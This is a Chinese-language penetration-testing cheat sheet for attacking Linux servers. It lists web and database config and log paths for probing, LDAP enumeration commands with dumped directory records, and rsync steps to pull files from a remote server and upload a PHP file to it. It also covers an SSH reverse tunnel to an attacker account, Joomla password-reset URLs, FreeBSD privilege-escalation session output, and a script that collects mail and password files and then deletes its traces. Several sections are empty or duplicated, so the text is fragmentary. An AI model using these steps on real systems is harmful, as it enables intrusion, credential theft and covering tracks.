本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。
Linux 系统下的一些常见路径:
013 | /var/www/htdocs/index.php |
015 | /var/www/conf/httpd.conf |
017 | /var/www/htdocs/index.html |
019 | /var/httpd/conf/php.ini |
021 | /var/httpd/htdocs/index.php |
023 | /var/httpd/conf/httpd.conf |
025 | /var/httpd/htdocs/index.html |
027 | /var/httpd/conf/php.ini |
033 | /opt/www/conf/httpd.conf |
035 | /opt/www/htdocs/index.php |
037 | /opt/www/htdocs/index.html |
039 | /usr/local/apache/htdocs/index.html |
041 | /usr/local/apache/htdocs/index.php |
043 | /usr/local/apache2/htdocs/index.html |
045 | /usr/local/apache2/htdocs/index.php |
047 | /usr/local/httpd2.2/htdocs/index.php |
049 | /usr/local/httpd2.2/htdocs/index.html |
051 | /tmp/apache/htdocs/index.html |
053 | /tmp/apache/htdocs/index.php |
055 | /etc/httpd/htdocs/index.php |
057 | /etc/httpd/conf/httpd.conf |
059 | /etc/httpd/htdocs/index.html |
071 | /www/htdocs/index.html |
073 | /usr/local/httpd/conf/httpd.conf |
075 | /apache/apache/conf/httpd.conf |
077 | /apache/apache2/conf/httpd.conf |
079 | /etc/apache/apache.conf |
081 | /etc/apache2/apache.conf |
083 | /etc/apache/httpd.conf |
085 | /etc/apache2/httpd.conf |
087 | /etc/apache2/vhosts.d/00_default_vhost.conf |
089 | /etc/apache2/sites-available/default |
091 | /etc/phpmyadmin/config.inc.php |
095 | /etc/httpd/conf.d/php.conf |
097 | /etc/httpd/conf.d/httpd.conf |
099 | /etc/httpd/logs/error_log |
101 | /etc/httpd/logs/error.log |
103 | /etc/httpd/logs/access_log |
105 | /etc/httpd/logs/access.log |
107 | /home/apache/conf/httpd.conf |
109 | /home/apache2/conf/httpd.conf |
111 | /var/log/apache/error_log |
113 | /var/log/apache/error.log |
115 | /var/log/apache/access_log |
117 | /var/log/apache/access.log |
119 | /var/log/apache2/error_log |
121 | /var/log/apache2/error.log |
123 | /var/log/apache2/access_log |
125 | /var/log/apache2/access.log |
127 | /var/www/logs/error_log |
129 | /var/www/logs/error.log |
131 | /var/www/logs/access_log |
133 | /var/www/logs/access.log |
135 | /usr/local/apache/logs/error_log |
137 | /usr/local/apache/logs/error.log |
139 | /usr/local/apache/logs/access_log |
141 | /usr/local/apache/logs/access.log |
151 | /usr/local/apache/logs/access_logaccess_log.old |
153 | /usr/local/apache/logs/error_logerror_log.old |
169 | /usr/local/etc/php.ini |
171 | /usr/local/lib/php.ini |
173 | /usr/local/php/lib/php.ini |
175 | /usr/local/php4/lib/php.ini |
177 | /usr/local/php4/php.ini |
179 | /usr/local/php4/lib/php.ini |
181 | /usr/local/php5/lib/php.ini |
183 | /usr/local/php5/etc/php.ini |
185 | /usr/local/php5/php5.ini |
187 | /usr/local/apache/conf/php.ini |
189 | /usr/local/apache/conf/httpd.conf |
191 | /usr/local/apache2/conf/httpd.conf |
193 | /usr/local/apache2/conf/php.ini |
195 | /etc/php4.4/fcgi/php.ini |
197 | /etc/php4/apache/php.ini |
199 | /etc/php4/apache2/php.ini |
201 | /etc/php5/apache/php.ini |
203 | /etc/php5/apache2/php.ini |
209 | /etc/php/apache/php.ini |
211 | /etc/php/apache2/php.ini |
215 | /usr/local/Zend/etc/php.ini |
217 | /opt/xampp/etc/php.ini |
219 | /var/local/www/conf/php.ini |
221 | /var/local/www/conf/httpd.conf |
239 | /xampp/apache/bin/php.ini |
241 | /xampp/apache/conf/httpd.conf |
243 | /NetServer/bin/stable/apache/php.ini |
245 | /home2/bin/stable/apache/php.ini |
247 | /home/bin/stable/apache/php.ini |
249 | /var/log/mysql/mysql-bin.log |
253 | /var/log/mysqlderror.log |
255 | /var/log/mysql/mysql.log |
257 | /var/log/mysql/mysql-slow.log |
263 | /usr/local/mysql/my.cnf |
265 | /usr/local/mysql/bin/mysql |
271 | /usr/local/cpanel/logs |
273 | /usr/local/cpanel/logs/stats_log |
275 | /usr/local/cpanel/logs/access_log |
277 | /usr/local/cpanel/logs/error_log |
279 | /usr/local/cpanel/logs/license_log |
281 | /usr/local/cpanel/logs/login_log |
283 | /usr/local/cpanel/logs/stats_log |
285 | /usr/local/share/examples/php4/php.ini |
287 | /usr/local/share/examples/php/php.ini |
289 | /usr/local/tomcat5527/bin/version.sh |
291 | /usr/share/tomcat6/bin/startup.sh |
293 | /usr/tomcat6/bin/startup.sh |
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:
看看密码登录策略我们可以看到使用了file ldap模式
3 | base ou=People,dc=unix-center,dc=net |
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
1 | ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2 |
有密码形式
1 | ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2 |
4.查找10条用户记录
1 | ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口 |
实战:
看看密码登录策略我们可以看到使用了file ldap模式
3 | base ou=People,dc=unix-center,dc=net |
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
1 | ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2 |
有密码形式
1 | ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2 |
4.查找10条用户记录
1 | ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口 |
渗透实战:
1.返回所有的属性
01 | ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*" |
05 | dn: dc=ruc,dc=edu,dc=cn |
11 | dn: uid=manager,dc=ruc,dc=edu,dc=cn |
15 | objectClass: inetOrgPerson |
17 | objectClass: organizationalPerson |
27 | dn: uid=superadmin,dc=ruc,dc=edu,dc=cn |
31 | objectClass: inetOrgPerson |
33 | objectClass: organizationalPerson |
43 | dn: uid=admin,dc=ruc,dc=edu,dc=cn |
47 | objectClass: inetOrgPerson |
49 | objectClass: organizationalPerson |
59 | dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn |
67 | objectClass: organizationalPerson |
69 | objectClass: inetOrgPerson |
2.查看基类
3.查找
009 | namingContexts: dc=ruc,dc=edu,dc=cn |
011 | supportedExtension: 2.16.840.1.113730.3.5.7 |
013 | supportedExtension: 2.16.840.1.113730.3.5.8 |
015 | supportedExtension: 1.3.6.1.4.1.4203.1.11.1 |
017 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25 |
019 | supportedExtension: 2.16.840.1.113730.3.5.3 |
021 | supportedExtension: 2.16.840.1.113730.3.5.5 |
023 | supportedExtension: 2.16.840.1.113730.3.5.6 |
025 | supportedExtension: 2.16.840.1.113730.3.5.4 |
027 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1 |
029 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2 |
031 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3 |
033 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4 |
035 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5 |
037 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6 |
039 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7 |
041 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8 |
043 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9 |
045 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23 |
047 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11 |
049 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12 |
051 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13 |
053 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14 |
055 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15 |
057 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16 |
059 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17 |
061 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18 |
063 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19 |
065 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21 |
067 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22 |
069 | supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24 |
071 | supportedExtension: 1.3.6.1.4.1.1466.20037 |
073 | supportedExtension: 1.3.6.1.4.1.4203.1.11.3 |
075 | supportedControl: 2.16.840.1.113730.3.4.2 |
077 | supportedControl: 2.16.840.1.113730.3.4.3 |
079 | supportedControl: 2.16.840.1.113730.3.4.4 |
081 | supportedControl: 2.16.840.1.113730.3.4.5 |
083 | supportedControl: 1.2.840.113556.1.4.473 |
085 | supportedControl: 2.16.840.1.113730.3.4.9 |
087 | supportedControl: 2.16.840.1.113730.3.4.16 |
089 | supportedControl: 2.16.840.1.113730.3.4.15 |
091 | supportedControl: 2.16.840.1.113730.3.4.17 |
093 | supportedControl: 2.16.840.1.113730.3.4.19 |
095 | supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2 |
097 | supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6 |
099 | supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8 |
101 | supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1 |
103 | supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1 |
105 | supportedControl: 2.16.840.1.113730.3.4.14 |
107 | supportedControl: 1.3.6.1.4.1.1466.29539.12 |
109 | supportedControl: 2.16.840.1.113730.3.4.12 |
111 | supportedControl: 2.16.840.1.113730.3.4.18 |
113 | supportedControl: 2.16.840.1.113730.3.4.13 |
115 | supportedSASLMechanisms: EXTERNAL |
117 | supportedSASLMechanisms: DIGEST-MD5 |
119 | supportedLDAPVersion: 2 |
121 | supportedLDAPVersion: 3 |
123 | vendorName: Sun Microsystems, Inc. |
125 | vendorVersion: Sun-Java(tm)-System-Directory/6.2 |
127 | dataversion: 020090516011411 |
129 | netscapemdsuffix: cn=ldap://dc=webA:389 |
131 | supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA |
133 | supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA |
135 | supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA |
137 | supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA |
139 | supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA |
141 | supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA |
143 | supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA |
145 | supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA |
147 | supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA |
149 | supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA |
151 | supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA |
153 | supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA |
155 | supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA |
157 | supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA |
159 | supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA |
161 | supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA |
163 | supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA |
165 | supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA |
167 | supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5 |
169 | supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA |
171 | supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA |
173 | supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA |
175 | supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA |
177 | supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA |
179 | supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA |
181 | supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA |
183 | supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA |
185 | supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA |
187 | supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA |
189 | supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA |
191 | supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA |
193 | supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA |
195 | supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA |
197 | supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA |
199 | supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA |
201 | supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5 |
203 | supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5 |
205 | supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA |
207 | supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA |
209 | supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA |
211 | supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA |
213 | supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA |
215 | supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5 |
217 | supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5 |
219 | supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5 |
221 | supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5 |
223 | supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5 |
225 | supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5 |
227 | supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 |
liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:
列举IP:
liunx 相关提权渗透技巧总结,三、rsync渗透技巧:
1.查看rsync服务器上的列表:
看相应的下级目录(注意一定要在目录后面添加上/)
1 | rsync 210.51.X.X::htdocs_app/ |
2.下载rsync服务器上的配置文件
1 | rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/ |
3.向上更新rsync文件(成功上传,不会覆盖)
1 | rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/ |
liunx 相关提权渗透技巧总结,四、squid渗透技巧:
liunx 相关提权渗透技巧总结,五、SSH端口转发:
1 | ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip |
liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:
确定版本:
1 | index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47 |
重新设置密码:
1 | index.php?option=com_user&view=reset&layout=confirm |
liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:
liunx 相关提权渗透技巧总结,八、freebsd本地提权:
01 | [argp@julius ~]$ uname -rsi |
03 | * freebsd 7.3-RELEASE GENERIC |
05 | * [argp@julius ~]$ sysctl vfs.usermount |
11 | * uid=1001(argp) gid=1001(argp) groups=1001(argp) |
13 | * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex |
15 | * [argp@julius ~]$ ./nfs_mount_ex |
tar 文件夹打包:
1、tar打包:
1 | tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif 排除目录 /xx/xx/* |
3 | alzip打包(韩国) alzip -a D:\WEB d:\web*.rar |
{
注:
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
那么用这条比较好
1 | tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/* |
}
系统信息收集:
23 | cp -a /var/mail /tmp/getmail 2>/dev/null |
51 | cat /etc/passwd|grep -i sh |
57 | for i in {oracle,mysql,tomcat,samba,apache,ftp} |
59 | cat /etc/passwd|grep -i $i |
63 | locate passwd >/tmp/password 2>/dev/null |
67 | locate password >>/tmp/password 2>/dev/null |
71 | locate conf >/tmp/sysconfig 2>dev/null |
75 | locate config >>/tmp/sysconfig 2>/dev/null |
83 | tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig |
85 | rm -rf /tmp/getmail /tmp/password /tmp/sysconfig |